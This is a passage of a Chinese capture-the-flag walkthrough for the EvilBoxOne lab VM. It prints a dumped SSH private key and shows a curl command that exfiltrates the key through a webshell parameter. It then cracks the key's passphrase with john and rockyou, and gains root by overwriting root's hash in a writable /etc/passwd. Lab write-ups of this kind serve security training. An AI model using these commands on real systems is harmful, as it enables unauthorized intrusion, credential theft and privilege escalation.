  o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
  +gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
  b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
  HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
  9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
  zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
  rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
  tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
  94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
  VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
  Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
  hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
  Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
  IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
  MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
  62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
  Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
  p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
  pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
  KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
  i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
  4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
  8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
  -----END RSA PRIVATE KEY-----
  输出 >>>/home/mowree/.ssh/id_rsa.pub:
  输出 >>>/home/mowree/.ssh/ssh_host_dsa_key:
  输出 >>>/home/mowree/.ssh/ssh_host_dsa_key.pub:
  输出 >>>/home/mowree/.ssh/ssh_host_key:
  输出 >>>/home/mowree/.ssh/ssh_host_key.pub:
  输出 >>>/home/mowree/.ssh/ssh_host_rsa_key:
  输出 >>>/home/mowree/.ssh/ssh_host_rsa_key.pub:
  

中大奖：

• /home/mowree/.ssh/authorized_keys

  ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAXfEfC22Bpq40UDZ8QXeuQa6EVJPmW6BjB4Ud/knShqQ86qCUatKaNlMfdpzKaagEBtlVUYwit68VH5xHV/QIcAzWi+FNw0SB2KTYvS514pkYj2mqrONdu1LQLvgXIqbmV7MPyE2AsGoQrOftpLKLJ8JToaIUCgYsVPHvs9Jy3fka+qLRHb0HjekPOuMiq19OeBeuGViaqILY+w9h19ebZelN8fJKW3mX4mkpM7eH4C46J0cmbK3ztkZuQ9e8Z14yAhcehde+sEHFKVcPS0WkHl61aTQoH/XTky8dHatCUucUATnwjDvUMgrVZ5cTjr4Q4YSvSRSIgpDP2lNNs1B7 mowree@EvilBoxOne
  

• /home/mowree/.ssh/id_rsa

  -----BEGIN RSA PRIVATE KEY-----
  Proc-Type: 4,ENCRYPTED
  DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
  
  uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
  hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
  o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
  +gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
  b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
  HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
  9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
  zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
  rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
  tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
  94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
  VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
  Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
  hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
  Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
  IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
  MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
  62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
  Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
  p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
  pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
  KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
  i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
  4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
  8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
  -----END RSA PRIVATE KEY-----
  

我们直接抓到 mowree 公钥和私钥信息，我们通过盗窃私钥即可进行攻击

• 通过此命令组合盗窃 touch id_rsa && curl "http://192.168.56.117/secret/evil.php?command=/home/mowree/.ssh/id_rsa" > id_rsa && chmod 600 id_rsa

• 尝试登录 ssh mowree@192.168.56.117 -i id_rsa

  • -i 指定登录的验证密钥

  ┌──(kali㉿kali)-[~/workspace]
  └─$ ssh mowree@192.168.56.117 -i id_rsa 
  The authenticity of host '192.168.56.117 (192.168.56.117)' can't be established.
  ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8.
  This key is not known by any other names
  Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
  nter passphrase for key 'id_rsa': 
  

登录后需要密码，我们暂且尝试 john 爆破

• 首先我们需要将得到的私钥转化为 john 可以理解的格式 /usr/share/john/ssh2john.py ./id_rsa > ./hash_id_rsa
• 爆破 john hash_id_rsa --wordlist=/usr/share/wordlists/rockyou.txt 如果 rockyou.txt 没有，需要解压 rockyou.txt.gz 命令 sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

┌──(kali㉿kali)-[~/workspace]
└─$ john hash_id_rsa --wordlist=/usr/share/wordlists/rockyou.txt                                                                          1 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn          (./id_rsa)     
1g 0:00:00:00 DONE (2022-11-10 19:22) 50.00g/s 62100p/s 62100c/s 62100C/s unicorn
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

• 结果为 unicorn

┌──(kali㉿kali)-[~/workspace]
└─$ ssh mowree@192.168.56.117 -i id_rsa
Enter passphrase for key 'id_rsa': 
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

登录成功，我们可以进行下一步

提权

探索一下文件目录，发现第一个 flag

mowree@EvilBoxOne:~$ ls
user.txt
mowree@EvilBoxOne:~$ cat user.txt 
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

当然我们还是需要继续提权获得 root

• 查看 sudo 相关，发现无果
• 查看版本，发现内核利用也无果
• 查看我们具有写权限的隐秘文件是否存在 find / -writable 2>/dev/null | grep 'etc' 一般查看配置文件目录

mowree@EvilBoxOne:~$ find / -writable 2>/dev/null | grep 'etc'
/etc/passwd

• 又是这个文件 /etc/passwd

• 这个文件如果有写权限，即可强行篡改用户密码

• 我们拟定一个密码 123 使用 openssl passwd -1 生成 $1$ttAneAtg$4fJVH7JPaan5i4rI.t2xy/

• 篡改 /etc/passwd

  root:$1$ttAneAtg$4fJVH7JPaan5i4rI.t2xy/:0:0:root:/root:/bin/bash
  

• 使用 su root 登录

  mowree@EvilBoxOne:~$ su root
  Contraseña: 
  root@EvilBoxOne:/home/mowree# id
  uid=0(root) gid=0(root) grupos=0(root)
  

结果

root@EvilBoxOne:/home/mowree# ls
user.txt
root@EvilBoxOne:/home/mowree# cat user.txt 
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

GAME　OVER